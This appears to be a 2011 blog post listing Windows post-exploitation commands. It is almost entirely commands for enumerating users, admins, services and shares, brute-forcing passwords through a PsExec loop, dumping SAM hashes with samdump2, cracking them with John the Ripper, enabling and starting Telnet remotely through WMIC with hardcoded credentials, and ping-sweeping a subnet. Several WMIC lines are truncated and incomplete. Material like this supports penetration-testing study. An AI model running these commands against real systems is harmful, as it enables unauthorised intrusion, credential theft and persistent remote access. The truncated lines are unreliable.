Sep 25, 2011

Howto: Command For Information Gathering Of Windows Post Exploitation

If you want to see all command and results of each command, please go to the Source.

gathering System related information 


Running Services

C:\>tasklist /svc 

Installed Services

C:\>sc query state= all

Current environment settings


Find Username

C:\>set | find "USERNAME"

Find Domain

C:\>set | find "USERDOMAIN"

Find Current User Information

C:\>net user John 

Find Users with Administrator Privileges in the current machine

C:\>net localgroup Administrators 

Password Guessing with PsExec

Username: Jack Computer Name: XP-INTRANET Password List: PassLis.txt

C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************

Extract Hashes from the sam and system file with samdump2

root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist

root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information

C:\>ipconfig /displaydns

OS Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 

Shares Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 

List Services Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 

Change start mode of service to automatically start upon boot

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 

Starting telnet service

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep

C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"

If you like my blog, Please Donate Me

No comments: